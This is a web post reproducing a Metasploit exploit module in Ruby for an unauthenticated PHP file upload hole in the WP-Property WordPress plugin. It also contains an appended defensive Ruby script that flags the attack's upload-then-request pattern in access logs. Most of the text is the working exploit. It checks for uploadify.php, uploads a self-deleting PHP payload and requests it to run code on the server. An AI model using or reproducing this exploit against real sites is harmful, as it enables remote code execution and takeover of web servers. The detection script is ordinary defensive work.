
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it. I mean, it's msf.
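A defender's view of the two requests the module above sends, as an added example that is not part of the original post or of Metasploit: because the payload is built with `:unlink_self=>true`, the uploaded file may no longer be on disk afterwards, so this sketch looks in the web access log for a 200-status POST to uploadify.php followed by a GET of a .php file in the same directory from the same client. The function name `find_upload_then_exec`, the Apache combined log format, the 300-second window and the sample log lines are assumptions made for the example.

```ruby
require 'time'

# Directory of the upload handler named in the module above; the module's
# "folder" form field points uploads at this same directory.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /
WINDOW = 300 # seconds allowed between upload and follow-up GET (assumed value)

# Returns one finding per GET of a .php file in the uploadify directory that
# follows a 200-status POST to uploadify.php from the same client address.
def find_upload_then_exec(lines)
  uploads = {} # client address => time of its last successful upload POST
  findings = []
  lines.each do |line|
    m = LOG_RE.match(line) or next
    ip, stamp, verb, path, status = m.captures
    time = Time.strptime(stamp, '%d/%b/%Y:%H:%M:%S %z')
    path = path.split('?', 2).first
    idx = path.index(UPLOADIFY_DIR) or next
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    if verb == 'POST' && file == 'uploadify.php' && status == '200'
      uploads[ip] = time
    elsif verb == 'GET' && file != 'uploadify.php' && file.match?(/\A[^\/]+\.php\z/i)
      seen = uploads[ip]
      next unless seen && (time - seen).between?(0, WINDOW)
      findings << { ip: ip, file: file, uploaded_at: seen, requested_at: time }
    end
  end
  findings
end

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = <<~LOG.lines
  198.51.100.20 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:41:02 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:41:03 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 74 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:41:04 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWxYz.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.20 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
  198.51.100.20 - - [04/Jan/2013:19:42:05 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/other.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
LOG

find_upload_then_exec(SAMPLE_LOG).each do |f|
  puts "#{f[:ip]} uploaded at #{f[:uploaded_at]} then requested #{f[:file]}"
end
```

The correlation is per client address, so an upload and a follow-up request arriving from different addresses will not be paired by this check.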